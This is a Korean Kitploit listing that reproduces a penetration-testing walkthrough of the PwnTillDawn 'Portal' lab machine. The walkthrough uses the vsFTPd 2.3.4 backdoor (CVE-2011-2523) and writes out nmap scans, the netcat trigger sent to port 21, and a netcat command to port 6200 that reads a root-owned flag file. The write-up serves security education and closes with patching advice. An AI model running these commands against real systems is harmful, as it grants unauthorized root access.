Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PwnTillDawn-Portal-Walkthrough — 'Portal' 머신에 대한 상세한 침투 테스트 워크스루 및 익스플로잇 보고서로, CVE-2011-2523 (vsFTPd 2.3.4 Backdoor)에 초점을 맞추어 루트 액세스를 달성합니다. | Kitploit
도구/GitHubGitHub/tr00jan99/pwntilldawn-portal-walkthrough
Privilege EscalationReconnaissanceVulnerability AnalysisExploitationPost-ExploitationCTFPenetration TestingLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
tr00jan99/pwntilldawn-portal-walkthrough

PwnTillDawn-Portal-Walkthrough

'Portal' 머신에 대한 상세한 침투 테스트 워크스루 및 익스플로잇 보고서로, CVE-2011-2523 (vsFTPd 2.3.4 Backdoor)에 초점을 맞추어 루트 액세스를 달성합니다.

저장소 보기
25개월 전아직 검토되지 않음

🔐 취약점 평가 및 침투 테스트 (VAPT)

📌 프로젝트: 대상 익스플로잇 워크스루

⚠️ 이 프로젝트는 교육 및 승인된 테스트 목적으로만 사용됩니다.
무단 시스템 접근은 엄격히 금지됩니다.


👨‍💻 작성자

SYAFIQ
역할: 수석 침투 테스터


🎯 대상 정보

  • 대상 IP: 10.150.150.12
  • 운영 체제: Ubuntu Linux
  • 상태: 🔴 심각 (백도어 탐지됨)
  • 취약점: CVE-2011-2523 (vsFTPd 백도어)

🧭 공격 개요

단계도구설명
발견Nmap네트워크 스캔으로 활성 호스트 탐색
열거Nmap서비스 및 버전 식별
분석NSE Script알려진 취약점 탐지
익스플로잇Netcat백도어 트리거
사후 익스플로잇터미널루트 접근 권한 획득 및 플래그 검색

🚀 단계별 워크스루

🔍 1단계: 네트워크 정찰

네트워크에서 활성 호스트 스캔:

root@kitploit:~
nmap -sn --unprivileged 10.150.150.10-30

✅ 결과:

-8개 호스트 탐지됨 -대상 식별됨: 10.150.150.12

🔎 2단계: 서비스 열거

열린 포트 및 서비스 스캔:

root@kitploit:~
nmap -Pn -F --unprivileged -sV 10.150.150.12

✅ 발견 사항:

-포트 21 → FTP (vsftpd) -포트 22 → SSH (OpenSSH 8.2p1)

⚠️ 3단계: 취약점 스캔

알려진 FTP 백도어 취약점 확인:

root@kitploit:~
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12

🚨 결과:

-대상 취약 상태 -CVE-2011-2523 확인됨

💣 4단계: 익스플로잇

악성 사용자 이름을 사용하여 백도어 트리거:

root@kitploit:~
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21

⚡ 이는 포트 6200에 숨겨진 루트 셸을 엽니다.

🔓 5단계: 접근 권한 획득 (루트 셸)

백도어에 연결하고 명령 실행:

root@kitploit:~
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200

✅ 결과:

-루트 접근 권한 획득 -uid=0(root) 확인됨

🏁 플래그 획득:

root@kitploit:~
5ee499eb5d0b8e4269b13483e57adaa0b3815f48

🧠 주요 시사점

-항상 오래된 서비스 업데이트 (vsFTPd는 취약함) -잘못 구성된 서비스는 전체 시스템 손상으로 이어질 수 있음 -간단한 스캔으로 치명적인 취약점을 발견할 수 있음 -🛡️ 권장 사항 -🔄 FTP 서비스를 최신 버전으로 업데이트 -🚫 불필요한 서비스 비활성화 -🔐 방화벽을 사용하여 접근 제한 -📊 정기적인 보안 감사 수행 -📚 면책 조항

이 프로젝트는 오직 다음을 위해 생성되었습니다:

-사이버 보안 학습 -윤리적 해킹 실습 -승인된 침투 테스트

❌ 이 지식을 불법 활동에 사용하지 마십시오.

⭐ 마지막 메모

“보안은 제품이 아니라 과정입니다.” — 항상 테스트하고, 모니터링하고, 개선하십시오.

도구 다운로드